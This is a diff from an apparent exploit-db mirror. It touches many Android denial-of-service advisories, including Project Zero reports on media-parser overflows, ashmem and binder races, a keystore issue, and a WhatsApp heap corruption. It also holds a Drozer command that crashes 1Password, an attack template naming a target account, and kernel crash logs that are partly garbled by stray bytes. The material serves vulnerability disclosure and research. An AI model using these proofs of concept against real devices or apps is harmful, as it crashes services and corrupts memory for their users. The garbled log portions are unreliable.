When parsing AVI files, CAVIFileParser uses the stream count from the AVI header
to allocate backing storage for storing metadata about the streams (member
variable m_aStream). However, the number of stream headers we parse is never
validated against this allocation size during parsing, so we can write further
metadata past the end of this buffer by constructing a file which contains more
stream headers than expected.
@ -38,20 +38,20 @@ int CAVIFileParser::ParseChunkAviHdr(int a2, unsigned int chunk_size)
}
There doesn't appear to be any integer overflow checking in the multiplication
either; so if the current issue is directly fixed there could still be a
either; so if the current issue is directly fixed there could still be a
vulnerability if stream_count * sizeof(struct AviStream) overflows.
this->m_aStreamIndex is incremented without checking in
this->m_aStreamIndex is incremented without checking in
CAVIFileParser::ParseChild and used as an index into m_aStream in several places
without checking, including in CAVIFileParser::ParseChunkStrHdr and
CAVIFileParser::ParseChunkStrFmt.
Several of the values that we can get written out of bounds are pointers to
Several of the values that we can get written out of bounds are pointers to
controlled data, which is an interesting exploitation primitive. I've attached
a PoC file and script to generate it which results in overlapping a SRIFFNode*
with the contents of a 'strf' chunk, resulting in a free of an attacker
controlled pointer - in this case, 0x41414141. Since the structure sizes are
dependent on the version of the library, this may not work on different builds,
a PoC file and script to generate it which results in overlapping a SRIFFNode*
with the contents of a 'strf' chunk, resulting in a free of an attacker
controlled pointer - in this case, 0x41414141. Since the structure sizes are
dependent on the version of the library, this may not work on different builds,
but it will hopefully cause a crash regardless.
Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'

4
exploits/android/dos/42171.txt
View file

@ -1,13 +1,13 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1222
There is a memcpy in ASFParser::ParseHeaderExtensionObjects which doesn't check
that the size of the copy is smaller than the size of the source buffer,
that the size of the copy is smaller than the size of the source buffer,
resulting in an out-of-bounds heap read.
The vulnerable code appears to be in handling the parsing of an extension object of
type ASF_Metadata_Object with a Description Record with an overly large length.
See attached for a crash poc. This issue probably allows leaking mediaserver
See attached for a crash poc. This issue probably allows leaking mediaserver
memory from an app process on the device via the retrieved metadata.
Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'

2
exploits/android/dos/43189.py
View file

@ -69,7 +69,7 @@ def main():
YOUR_CREDENTIAL = "GET A GOOGLE ACCOUNT TEMPORARY PASSWORD AND PUT IT HERE"
TO_ADDRESS = "ACCOUNT TO ATTACK HERE"
composed = """Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="----714A286D976BF3E58D9D671E37CBCF7C"
MIME-Version: 1.0

6
exploits/android/dos/43464.txt
View file

@ -10,7 +10,7 @@ This issue has since been addressed (CVE-2017-0412), using the following pattern
3. jniThrowException(env, "java/io/IOException", "bad ashmem size");
4. return -1;
5. }
6.
6.
7. // IMPORTANT: Ashmem allows the caller to change its size until
8. // it is memory mapped for the first time which lazily creates
9. // the underlying VFS file. So the size we get above may not
@ -75,11 +75,11 @@ This issue can be exploited similarly to the previous ashmem bugs -- once a larg
While the exploitable condition is present in MemoryIntArray, I believe a fix should also be applied to the kernel to prevent such conditions from occurring in other contexts. Namely, the ashmem driver should acquire the "ashmem_mutex" during the ASHMEM_SET_SIZE operation, in order to guarantee that no races with ongoing "mmap" operations are possible. In addition, MemoryIntArray should not rely on multiple calls to ASHMEM_GET_SIZE, but should rather perform a single ASHMEM_GET_SIZE operation and store the returned size for both the "mmap" and "munmap" operations.
To demonstrate the race condition, I've added a busy loop to the ashmem driver between lines c. and d., increasing the race window to allow for easier demonstration of the schedule above.
To demonstrate the race condition, I've added a busy loop to the ashmem driver between lines c. and d., increasing the race window to allow for easier demonstration of the schedule above.
I've attached a PoC which triggers this race condition and causes system_server to call munmap on a large memory region. To reproduce the issue, apply the diff in "ashmem_delay.diff" to the ashmem driver, then run the attached program. Doing so should result in a large "munmap" operation in system_server, causing it to crash.
The issue can also be exploited from the "isolated_app" SELinux context (and perhaps from the Chrome sandbox?), as all that's required to leverage the attack is the ability to issue ashmem syscalls, and to interact with the ActivityManager service (which is exposed to "isolated_app").
The issue can also be exploited from the "isolated_app" SELinux context (and perhaps from the Chrome sandbox?), as all that's required to leverage the attack is the ability to issue ashmem syscalls, and to interact with the ActivityManager service (which is exposed to "isolated_app").
Proof of Concept:

6
exploits/android/dos/43513.txt
View file

@ -11,7 +11,7 @@ The "add" binder call allows callers to supply a binder instance to be registere
3. // TODO(b/34235311): use HIDL way to determine this
4. // also, this assumes that the PID that is registering is the pid that is the service
5. pid_t pid = IPCThreadState::self()->getCallingPid();
6.
6.
7. auto ret = service->interfaceChain([&](const auto &interfaceChain) {
8. if (interfaceChain.size() == 0) {
9. return;
@ -45,7 +45,7 @@ However, an alternate exploit flow exists, which allows the issue to be exploite
5. Hardware service manager executes "ServiceManager::add", records process B's pid, calls the (non-oneway) "interfaceChain" binder call on the given binder
6. Process A receives the "interfaceChain" binder call
7. Process A kills process B
8. Process A forks and kills the child processes, until reaching the pid before process B's pid
8. Process A forks and kills the child processes, until reaching the pid before process B's pid
9. Process A calls the "loadSoundEffects" binder call on the "audio" service, spawning a new long-lived thread in system_server ("SoundPoolThread")
10. The new thread occupies process B's pid
11. Process A completes the "interfaceChain" transaction
@ -61,7 +61,7 @@ I'm attaching a PoC which performs the aforementioned attack flow, resulting in
service manager: 0x7d0b44b000
token manager: 0x7d0b44b140
TOKEN: 0502010000000000B78268179E69C3B0EB6AEBFF60D82B42732F0FF853E8773379A005493648BCF1
05 02 01 00 00 00 00 00 B7 82 68 17 9E 69 C3 B0 EB 6A EB FF 60 D8 2B 42 73 2F 0F F8 53 E8 77 33 79 A0 05 49 36 48 BC F1
05 02 01 00 00 00 00 00 B7 82 68 17 9E 69 C3 B0 EB 6A EB FF 60 D8 2B 42 73 2F 0F F8 53 E8 77 33 79 A0 05 49 36 48 BC F1
pid=23702
service manager: 0x72e544e000
token manager: 0x72e544e0a0

4
exploits/android/dos/43996.txt
View file

@ -1,4 +1,4 @@
The keystore binder service ("android.security.IKeystoreService") allows users to issue several commands related to key management, including adding, removing, exporting and generating cryptographic keys. The service is accessible to many SELinux contexts, including application contexts, but also unprivileged daemons such as "media.codec".
The keystore binder service ("android.security.IKeystoreService") allows users to issue several commands related to key management, including adding, removing, exporting and generating cryptographic keys. The service is accessible to many SELinux contexts, including application contexts, but also unprivileged daemons such as "media.codec".
Binder calls to this service are unpacked by IKeyStoreService (http://androidxref.com/8.0.0_r4/xref/system/security/keystore/IKeystoreService.cpp), and are then passed on to be processed by KeyStoreService. The "generateKey" command is handled by "KeyStoreService::generateKey" (http://androidxref.com/8.0.0_r4/xref/system/security/keystore/key_store_service.cpp#691). Here is a snippet from this function:
@ -17,7 +17,7 @@ Binder calls to this service are unpacked by IKeyStoreService (http://androidxre
13. ALOGE("Non-system uid %d cannot set FLAG_CRITICAL_TO_DEVICE_ENCRYPTION", uid);
14. return ResponseCode::PERMISSION_DENIED;
15. }
16.
16.
17. if (containsTag(params, Tag::INCLUDE_UNIQUE_ID)) {
18. if (!checkBinderPermission(P_GEN_UNIQUE_ID)) return ResponseCode::PERMISSION_DENIED;
19. }

2
exploits/android/dos/44268.txt
View file

@ -1,3 +1,3 @@
This Exploit allows arbitrary memory writes and reads. Running the specified payload within this package will write to the device's main CPU kernel, causing it to crash. More information about its origins here: http://boosterok.com/blog/broadpwn2/
Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44268.zip
Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44268.zip

40
exploits/android/dos/45558.txt
View file

@ -115,40 +115,40 @@ an example of how it might look - a crash inside the memory allocator:
[ 997.010798] c7 1718 LR is at kgsl_drawobj_cmd_add_cmdlist+0x120/0x1e4
[ 997.010812] c7 1718 pc : [<ffffff9f4d9df18c>] lr : [<ffffff9f4de4e054>] pstate: 60400145
[ 997.010824] c7 1718 sp : fffffff2058ebbb0
[ 997.010836] x29: fffffff2058ebbf0 x28: fffffff2089c9b80
[ 997.010868] x27: ffffff9f501f4000 x26: fffffff2089c9b80
[ 997.010893] x25: fffffff18e07a448 x24: 0000000000000001
[ 997.010912] x23: fffffff2089c9b80 x22: fffffff239402b00
[ 997.010930] x21: fffffff2873e1180 x20: 00000000024000c0
[ 997.010952] x19: ffffff9f4de4e054 x18: 0000000000001600
[ 997.010959] x17: 0000007ea408ae34 x16: 00000000b0000000
[ 997.010965] x15: 000000017e4c0000 x14: 0000000000000006
[ 997.010972] x13: ffffff9f5008f490 x12: 0000000000000000
[ 997.010978] x11: 000000000012abd7 x10: 000000000012abcf
[ 997.010984] x9 : 0000000000000000 x8 : 000000000012abcf
[ 997.010990] x7 : 00000007fdcf4000 x6 : fffffff2058ebc28
[ 997.010996] x5 : fffffff2058ebc28 x4 : 0000000000000001
[ 997.011002] x3 : 0000000082cb5000 x2 : 0000000000000018
[ 997.011008] x1 : 00000000024000c0 x0 : fffffff239402b00
[ 997.011015] c7 1718
[ 997.010836] x29: fffffff2058ebbf0 x28: fffffff2089c9b80
[ 997.010868] x27: ffffff9f501f4000 x26: fffffff2089c9b80
[ 997.010893] x25: fffffff18e07a448 x24: 0000000000000001
[ 997.010912] x23: fffffff2089c9b80 x22: fffffff239402b00
[ 997.010930] x21: fffffff2873e1180 x20: 00000000024000c0
[ 997.010952] x19: ffffff9f4de4e054 x18: 0000000000001600
[ 997.010959] x17: 0000007ea408ae34 x16: 00000000b0000000
[ 997.010965] x15: 000000017e4c0000 x14: 0000000000000006
[ 997.010972] x13: ffffff9f5008f490 x12: 0000000000000000
[ 997.010978] x11: 000000000012abd7 x10: 000000000012abcf
[ 997.010984] x9 : 0000000000000000 x8 : 000000000012abcf
[ 997.010990] x7 : 00000007fdcf4000 x6 : fffffff2058ebc28
[ 997.010996] x5 : fffffff2058ebc28 x4 : 0000000000000001
[ 997.011002] x3 : 0000000082cb5000 x2 : 0000000000000018
[ 997.011008] x1 : 00000000024000c0 x0 : fffffff239402b00
[ 997.011015] c7 1718
[ 997.011015] c7 1718 PC: 0xffffff9f4d9df14c:
[ 997.011019] f14c b9401ae9 51000529 b9001ae9 35000069 f94002e9 37080449 f94002c9 d538d08a
[ 997.011040] f16c 8b090149 f940052a eb0a011f 54fffdc1 f9400135 b4000bb5 b98022c9 9100210b
[ 997.011060] f18c f8696ab8 b9401ae9 11000529 b9001ae9 f94002c9 d538d08a 8b090149 f9800131
[ 997.011080] f1ac c87f652a ca15014a ca080339 aa190159 b5000079 c82a2d38 35ffff4a b9401ae8
[ 997.011101] c7 1718
[ 997.011101] c7 1718
[ 997.011101] c7 1718 LR: 0xffffff9f4de4e014:
[ 997.011105] e014 b40004ca aa1703e1 2a1f03e2 97ee702c 910023e0 aa1603e1 aa1703e2 97f50b24
[ 997.011125] e034 b5000420 b94023e4 12000888 34000408 f9471360 52801801 72a04801 97ee442d
[ 997.011145] e054 aa0003e8 b40005a8 f9400be9 11000718 2a1f03e0 6b14031f f9001109 f9400fe9
[ 997.011164] e074 910082d6 f9001509 b94027e9 b9001109 f94007e9 f9000d09 b94023e9 a9037d09
[ 997.011185] c7 1718
[ 997.011185] c7 1718
[ 997.011185] c7 1718 SP: 0xfffffff2058ebb70:
[ 997.011189] bb70 4de4e054 ffffff9f 058ebbb0 fffffff2 4d9df18c ffffff9f 60400145 00000000
[ 997.011209] bb90 4fe2f270 ffffff9f 4fe2fe98 ffffff9f 00000000 00000080 4fe2cee8 ffffff9f
[ 997.011230] bbb0 8e07a448 fffffff1 a2257020 fffffff1 00000001 00000000 00000020 00000000
[ 997.011250] bbd0 0a083ac8 0000007e 4fe2cee8 ffffff9f 00000002 00000000 8e07a400 fffffff1
[ 997.011270] c7 1718
[ 997.011270] c7 1718
[ 997.011274] c7 1718 Process GLThread 41 (pid: 1718, stack limit = 0x0000000000000000)
[ 997.011278] c7 1718 Call trace:
[ 997.011283] c7 1718 Exception stack(0xfffffff2058eba80 to 0xfffffff2058ebbb0)
@ -170,7 +170,7 @@ an example of how it might look - a crash inside the memory allocator:
[ 997.011357] c7 1718 [<ffffff9f4da00dd0>] do_vfs_ioctl+0x434/0x884
[ 997.011361] c7 1718 [<ffffff9f4da012a8>] SyS_ioctl+0x88/0x94
[ 997.011367] c7 1718 [<ffffff9f4d883b0c>] __sys_trace_return+0x0/0x4
[ 997.011373] c7 1718 Code: f9400135 b4000bb5 b98022c9 9100210b (f8696ab8)
[ 997.011373] c7 1718 Code: f9400135 b4000bb5 b98022c9 9100210b (f8696ab8)
[ 997.011417] c7 1718 ---[ end trace aea07a0c0fb86e0d ]---
[ 997.015389] c7 1718 Kernel panic - not syncing: Fatal exception
================================================================================

2
exploits/android/dos/45579.txt
View file

@ -17,7 +17,7 @@ Heap corruption can occur when the WhatsApp mobile application receives a malfor
08-31 15:43:50.819 9720 9720 F DEBUG : x24 000000000000100d x25 000000000000120d x26 0000007104779480 x27 0000007108830828
08-31 15:43:50.819 9720 9720 F DEBUG : x28 0000000000151f80 x29 00000071043fe540 x30 000000711060a010
08-31 15:43:50.819 9720 9720 F DEBUG : sp 00000071043fe320 pc 000000712f3b0a5c pstate 0000000060000000
08-31 15:43:50.825 9720 9720 F DEBUG :
08-31 15:43:50.825 9720 9720 F DEBUG :
08-31 15:43:50.825 9720 9720 F DEBUG : backtrace:
08-31 15:43:50.825 9720 9720 F DEBUG : #00 pc 000000000001aa5c /system/lib64/libc.so (memcpy+340)
08-31 15:43:50.825 9720 9720 F DEBUG : #01 pc 00000000000c500c /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so

8
exploits/android/dos/46165.txt
View file

@ -10,18 +10,18 @@ com.agilebits.onepassword.filling.openyolo.OpenYoloRetrieveActivity from an
external application (since they are exported), it is possible to crash the
1Password instance.
############
Poc
############
To invoke the exported activity and crash the app, it is possible
to use Drozer:
run app.activity.start --component com.agilebits.onepassword
com.agilebits.onepassword.filling.openyolo.OpenYoloDeleteActivity
@ -36,7 +36,7 @@ Affected Components
com.agilebits.onepassword.filling.openyolo.OpenYoloDeleteActivity
com.agilebits.onepassword.filling.openyolo.OpenYoloRetrieveActivity
############
Disclosure timeline

6
exploits/android/dos/46504.txt
View file

@ -182,9 +182,9 @@ At this point, you can check whether it worked:
walleye:/ $ getprop ro.build.fingerprint
google/walleye/walleye:9/PQ1A.181205.002/5086253:user/release-keys
walleye:/ $ lshal 2>/dev/null | grep ISensorManager
android.frameworks.sensorservice@1.0::ISensorManager/bogusbogusbogus N/A N/A
android.frameworks.sensorservice@1.0::ISensorManager/default N/A N/A
walleye:/ $
android.frameworks.sensorservice@1.0::ISensorManager/bogusbogusbogus N/A N/A
android.frameworks.sensorservice@1.0::ISensorManager/default N/A N/A
walleye:/ $
=====================================================================

88
exploits/android/dos/46941.txt
View file

@ -56,7 +56,7 @@ set_page_dirty():
<3>[ 447.372706] c3 2621 ==================================================================
<3>[ 447.372963] c3 2621 BUG: KASAN: use-after-free in set_page_dirty+0x4c/0xd0
<3>[ 447.380051] c3 2621 Read of size 8 at addr 0000000000000000 by task kworker/3:3/2621
<3>[ 447.387059] c3 2621
<3>[ 447.387059] c3 2621
<4>[ 447.394762] c3 2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45
<4>[ 447.397158] c3 2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)
<4>[ 447.406473] c3 2621 Workqueue: kgsl-mementry _deferred_put
@ -74,7 +74,7 @@ set_page_dirty():
<4>[ 447.479093] c3 2621 [<ffffffa689edc6f4>] worker_thread+0x98/0x718
<4>[ 447.485551] c3 2621 [<ffffffa689ee59a4>] kthread+0x114/0x130
<4>[ 447.491801] c3 2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40
<3>[ 447.497696] c3 2621
<3>[ 447.497696] c3 2621
<3>[ 447.503818] c3 2621 Allocated by task 2684:
<4>[ 447.506206] c3 2621 [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8
<4>[ 447.511847] c3 2621 [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20
@ -93,7 +93,7 @@ set_page_dirty():
<4>[ 447.584407] c3 2621 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18
<4>[ 447.589787] c3 2621 [<ffffffa689e842b0BCho<D5>
^@^@<90>^A,^A^Hp<D6>M>] el0_svc_naked+0x24/0x28
<3>[ 447.594909] c3 2621
<3>[ 447.594909] c3 2621
<3>[ 447.599065] c3 2621 Freed by task 36:
<4>[ 447.601330] c3 2621 [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8
<4>[ 447.606461] c3 2621 [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20
@ -103,7 +103,7 @@ set_page_dirty():
<4>[ 447.629363] c3 2621 [<ffffffa689f5c430>] rcu_nocb_kthread+0x20c/0x264
<4>[ 447.634926] c3 2621 [<ffffffa689ee59a4>] kthread+0x114/0x130
<4>[ 447.640726] c3 2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40
<3>[ 447.645765] c3 2621
<3>[ 447.645765] c3 2621
<3>[ 447.649913] c3 2621 The buggy address belongs to the object at 0000000000000000
<3>[ 447.649913] c3 2621 which belongs to the cache ext4_inode_cache of size 1048
<3>[ 447.652315] c3 2621 The buggy address is located 680 bytes inside of
@ -124,41 +124,41 @@ set_page_dirty():
<4>[ 447.757719] c3 2621 LR is at dump_page+0x10/0x18
<4>[ 447.762390] c3 2621 pc : [<ffffffa689e836e8>] lr : [<ffffffa68a04d9dc>] pstate: 204003c5
<4>[ 447.767106] c3 2621 sp : ffffffd8929b2f60
<4>[ 447.775306] c3 2621 x29: ffffffd8929b4000 x28: ffffffd88e9a47d0
<4>[ 447.784631] c3 2621 x27: ffffffd8294fab80 x26: ffffffa68ba1f000
<4>[ 447.789927] c3 2621 x25: ffffffd8536fc908 x24: ffffffd8536fc4e8
<4>[ 447.795219] c3 2621 x23: ffffffd892e55500 x22: 0000000000000001
<4>[ 447.800513] c3 2621 x21: ffffffa68ba1aa00 x20: 0000000000000000
<4>[ 447.805809] c3 2621 x19: ffffffbe214dbe00 x18: 0000007f7dc4ef8a
<4>[ 447.811105] c3 2621 x17: 0000007f809eb0e0 x16: ffffffa68a0a5178
<4>[ 447.816400] c3 2621 x15: 0000000000000021 x14: 202c303030303030
<4>[ 447.821694] c3 2621 x13: 3030303030303030 x12: e95cc056ac940c73
<4>[ 447.826992] c3 2621 x11: ffffffd8929fb810 x10: ffffff8b12978008
<4>[ 447.832286] c3 2621 x9 : ffffff8b12978007 x8 : ffffffa68a21a558
<4>[ 447.837590] c3 2621 x7 : ffffffa68c69ec28 x6 : 0000000000000040
<4>[ 447.842872] c3 2621 x5 : 0000000000000000 x4 : ffffff87c429b7c0
<4>[ 447.848170] c3 2621 x3 : ffffffa68a04d8dc x2 : 0000000000000000
<4>[ 447.853468] c3 2621 x1 : ffffffa68ba1aa00 x0 : ffffffbe214dbe00
<4>[ 447.858765] c3 2621
<4>[ 447.775306] c3 2621 x29: ffffffd8929b4000 x28: ffffffd88e9a47d0
<4>[ 447.784631] c3 2621 x27: ffffffd8294fab80 x26: ffffffa68ba1f000
<4>[ 447.789927] c3 2621 x25: ffffffd8536fc908 x24: ffffffd8536fc4e8
<4>[ 447.795219] c3 2621 x23: ffffffd892e55500 x22: 0000000000000001
<4>[ 447.800513] c3 2621 x21: ffffffa68ba1aa00 x20: 0000000000000000
<4>[ 447.805809] c3 2621 x19: ffffffbe214dbe00 x18: 0000007f7dc4ef8a
<4>[ 447.811105] c3 2621 x17: 0000007f809eb0e0 x16: ffffffa68a0a5178
<4>[ 447.816400] c3 2621 x15: 0000000000000021 x14: 202c303030303030
<4>[ 447.821694] c3 2621 x13: 3030303030303030 x12: e95cc056ac940c73
<4>[ 447.826992] c3 2621 x11: ffffffd8929fb810 x10: ffffff8b12978008
<4>[ 447.832286] c3 2621 x9 : ffffff8b12978007 x8 : ffffffa68a21a558
<4>[ 447.837590] c3 2621 x7 : ffffffa68c69ec28 x6 : 0000000000000040
<4>[ 447.842872] c3 2621 x5 : 0000000000000000 x4 : ffffff87c429b7c0
<4>[ 447.848170] c3 2621 x3 : ffffffa68a04d8dc x2 : 0000000000000000
<4>[ 447.853468] c3 2621 x1 : ffffffa68ba1aa00 x0 : ffffffbe214dbe00
<4>[ 447.858765] c3 2621
<4>[ 447.858765] c3 2621 PC: 0xffffffa689e836a8:
<4>[ 447.859009] c3 2621 36a8 d503201f d503201f d503201f d503201f d503201f d503201f a90007e0 a9010fe2
<4>[ 447.873684] c3 2621 36c8 a90217e4 a9031fe6 a90427e8 a9052fea a90637ec a9073fee a90847f0 a9094ff2
<4>[ 447.881847] c3 2621 36e8 a90a57f4 a90b5ff6 a90c67f8 a90d6ffa a90e77fc 9104c3f5 d538411c f9400794
<4>[ 447.890005] c3 2621 3708 f90093f4 d2c01014 f9000794 d5384036 d5384017 a90f57fe d503201f d5382015
<4>[ 447.898172] c3 2621
<4>[ 447.898172] c3 2621
<4>[ 447.898172] c3 2621 LR: 0xffffffa68a04d99c:
<4>[ 447.898371] c3 2621 d99c b000ce80 9113e000 97feface aa1303e0 9400affc f9400260 9117e2e1 528002a2
<4>[ 447.91300BCho<D6>
^@^@<90>^A+^A<98>3<8E><DA>8] c3 2621 d9bc 9106c021 8a000280 97ffff2c 17ffffe6 a9bf7bfd d2800002 910003fd 97ffffb4
<4>[ 447.921170] c3 2621 d9dc a8c17bfd d65f03c0 a9ac7bfd 910003fd a90153f3 a9025bf5 a90363f7 a9046bf9
<4>[ 447.929328] c3 2621 d9fc a90573fb d10443ff aa0003f3 9400afe5 aa1303e0 f8410402 f90033a2 9400af97
<4>[ 447.937494] c3 2621
<4>[ 447.937494] c3 2621
<4>[ 447.937494] c3 2621 SP: 0xffffffd8929b2f20:
<4>[ 447.937693] c3 2621 2f20 8a04d9dc ffffffa6 929b2f60 ffffffd8 89e836e8 ffffffa6 204003c5 00000000
<4>[ 447.952331] c3 2621 2f40 00000000 00000000 00000000 00000000 ffffffff ffffffff 00000000 00000000
<4>[ 447.960491] c3 2621 2f60 214dbe00 ffffffbe 8ba1aa00 ffffffa6 00000000 00000000 8a04d8dc ffffffa6
<4>[ 447.968651] c3 2621 2f80 c429b7c0 ffffff87 00000000 00000000 00000040 00000000 8c69ec28 ffffffa6
<4>[ 447.976809] c3 2621
<4>[ 447.976809] c3 2621
<0>[ 447.976941] c3 2621 Process kworker/3:3 (pid: 2621, stack limit = 0x0000000000000000)
<4>[ 447.979247] c3 2621 Call trace:
<4>[ 447.987122] c3 2621 Exception stack(0xffffffd8929b2d60 to 0xffffffd8929b2e90)
@ -173,7 +173,7 @@ set_page_dirty():
<4>[ 448.058561] c3 2621 2e60: 0000000000000040 ffffffa68c69ec28 ffffffa68a21a558 ffffff8b12978007
<4>[ 448.067216] c3 2621 2e80: ffffff8b12978008 ffffffd8929fb810
<4>[ 448.075867] c3 2621 [<ffffffa689e836e8>] el1_sync+0x28/0xe0
<0>[ 448.081787] c3 2621 Code: a90637ec a9073fee a90847f0 a9094ff2 (a90a57f4)
<0>[ 448.081787] c3 2621 Code: a90637ec a9073fee a90847f0 a9094ff2 (a90a57f4)
<4>[ 448.087496] c3 2621 ---[ end trace 8d4b2347f8b71fe7 ]---
<4>[ 448.087540] c4 2684 ------------[ cut here ]------------
<2>[ 448.087544] c4 2684 Kernel BUG at 0000000000000000 [verbose debug info unavailable]
@ -186,41 +186,41 @@ set_page_dirty():
<4>[ 448.087581] c4 2684 LR is at qlist_free_all+0x7c/0x80
<4>[ 448.087585] c4 2684 pc : [<ffffffa68a07bbbc>] lr : [<ffffffa68a07bbfc>] pstate: 60400145
<4>[ 448.087586] c4 2684 sp : ffffffd87e3b3880
<4>[ 448.087591] c4 2684 x29: ffffffd87e3b3880 x28: ffffffa68ca1a000
<4>[ 448.087595] c4 2684 x27: 000000000591e848 x26: ffffffd87e3b3920
<4>[ 448.087598] c4 2684 x25: 0000000000000140 x24: 0000000000000000
<4>[ 448.087601] c4 2684 x23: ffffffd87e3b3920 x22: ffffffa68a07bbbc
<4>[ 448.087604] c4 2684 x21: 0000000000000000 x20: ffffffd8929f8040
<4>[ 448.087607] c4 2684 x19: ffffffd8929f8040 x18: 00000000c8056d20
<4>[ 448.087611] c4 2684 x17: 000000002c754130 x16: 0000000085837409
<4>[ 448.087613] c4 2684 x15: 00000000a50d5ad3 x14: 0000000000000000
<4>[ 448.087617] c4 2684 x13: 0000000001075000 x12: ffffffffffffffff
<4>[ 448.087620] c4 2684 x11: 0000000000000040 x10: ffffff8b0fc76746
<4>[ 448.087623] c4 2684 x9 : ffffff8b0fc76745 x8 : ffffffd87e3b3a2b
<4>[ 448.087626] c4 2684 x7 : 0000000000000000 x6 : ffffffd87e3b3a08
<4>[ 448.087629] c4 2684 x5 : fffffffffe8c0000 x4 : 0000000000000000
<4>[ 448.087591] c4 2684 x29: ffffffd87e3b3880 x28: ffffffa68ca1a000
<4>[ 448.087595] c4 2684 x27: 000000000591e848 x26: ffffffd87e3b3920
<4>[ 448.087598] c4 2684 x25: 0000000000000140 x24: 0000000000000000
<4>[ 448.087601] c4 2684 x23: ffffffd87e3b3920 x22: ffffffa68a07bbbc
<4>[ 448.087604] c4 2684 x21: 0000000000000000 x20: ffffffd8929f8040
<4>[ 448.087607] c4 2684 x19: ffffffd8929f8040 x18: 00000000c8056d20
<4>[ 448.087611] c4 2684 x17: 000000002c754130 x16: 0000000085837409
<4>[ 448.087613] c4 2684 x15: 00000000a50d5ad3 x14: 0000000000000000
<4>[ 448.087617] c4 2684 x13: 0000000001075000 x12: ffffffffffffffff
<4>[ 448.087620] c4 2684 x11: 0000000000000040 x10: ffffff8b0fc76746
<4>[ 448.087623] c4 2684 x9 : ffffff8b0fc76745 x8 : ffffffd87e3b3a2b
<4>[ 448.087626] c4 2684 x7 : 0000000000000000 x6 : ffffffd87e3b3a08
<4>[ 448.087629] c4 2684 x5 : fffffffffe8c0000 x4 : 0000000000000000
<4>[ 448.087632] c4 2684 x3 : fBCho<D7>
^@^@<90>^A*^A<91><F9>%5fffffd8929f7ff0 x2 : 0000000000000000
<4>[ 448.087635] c4 2684 x1 : dead0000000000ff x0 : 0000000000000000
<4>[ 448.087637] c4 2684
^@^@<90>^A*^A<91><F9>%5fffffd8929f7ff0 x2 : 0000000000000000
<4>[ 448.087635] c4 2684 x1 : dead0000000000ff x0 : 0000000000000000
<4>[ 448.087637] c4 2684
<4>[ 448.087637] c4 2684 PC: 0xffffffa68a07bb7c:
<4>[ 448.087646] c4 2684 bb7c 17fffff1 a9bc7bfd 910003fd a90153f3 a9025bf5 f9001bf7 f9400013 b4000253
<4>[ 448.087655] c4 2684 bb9c 90000016 aa0103f5 aa0003f7 912ef2d6 14000002 aa1403f3 aa1503e0 b40001f5
<4>[ 448.087664] c4 2684 bbbc b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff
<4>[ 448.087673] c4 2684 bbdc f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 97ffff93
<4>[ 448.087675] c4 2684
<4>[ 448.087675] c4 2684
<4>[ 448.087675] c4 2684 LR: 0xffffffa68a07bbbc:
<4>[ 448.087684] c4 2684 bbbc b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff
<4>[ 448.087692] c4 2684 bbdc f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 97ffff93
<4>[ 448.087701] c4 2684 bbfc 17fffff0 a9bc7bfd aa0003e2 910003fd a90153f3 f0012ed3 aa0003f4 b000eb40
<4>[ 448.087711] c4 2684 bc1c 910083a1 d538d083 913c8000 f90013bf 8b000060 f9452a63 f9001fa3 f90017bf
<4>[ 448.087712] c4 2684
<4>[ 448.087712] c4 2684
<4>[ 448.087712] c4 2684 SP: 0xffffffd87e3b3840:
<4>[ 448.087722] c4 2684 3840 8a07bbfc ffffffa6 7e3b3880 ffffffd8 8a07bbbc ffffffa6 60400145 00000000
<4>[ 448.087731] c4 2684 3860 7e3b3920 ffffffd8 00000000 00000000 00000000 00000080 8b4ddfd0 ffffffa6
<4>[ 448.087740] c4 2684 3880 7e3b38c0 ffffffd8 8a07bf9c ffffffa6 8c656000 ffffffa6 8ca1f500 ffffffa6
<4>[ 448.087749] c4 2684 38a0 8ca1a000 ffffffa6 000000f7 00000000 8c68d000 ffffffa6 fabb3a00 ffffffd7
<4>[ 448.087750] c4 2684
<4>[ 448.087750] c4 2684
<0>[ 448.087753] c4 2684 Process poc (pid: 2684, stack limit = 0x0000000000000000)
<4>[ 448.087754] c4 2684 Call trace:
<4>[ 448.087758] c4 2684 Exception stack(0xffffffd87e3b3680 to 0xffffffd87e3b37b0)
@ -248,7 +248,7 @@ set_page_dirty():
<4>[ 448.087866] c4 2684 [<ffffffa68a089004>] do_sys_open+0x170/0x2d4
<4>[ 448.087869] c4 2684 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18
<4>[ 448.087875] c4 2684 [<ffffffa689e842b0>] el0_svc_naked+0x24/0x28
<0>[ 448.087881] c4 2684 Code: 14000002 aa1403f3 aa1503e0 b40001f5 (b980c401)
<0>[ 448.087881] c4 2684 Code: 14000002 aa1403f3 aa1503e0 b40001f5 (b980c401)
<4>[ 448.087944] c4 2684 ---[ end trace 8d4DBGC
==================================

2
exploits/android/dos/47119.txt
View file

@ -71,7 +71,7 @@ Hvec-"fright" is possible. You can own the mobile by viewing a video with payloa
07-13 21:50:59.010 24089 24089 F DEBUG : x24 000000000000001e x25 0000000000000094 x26 0000000000004160 x27 0000000000000001
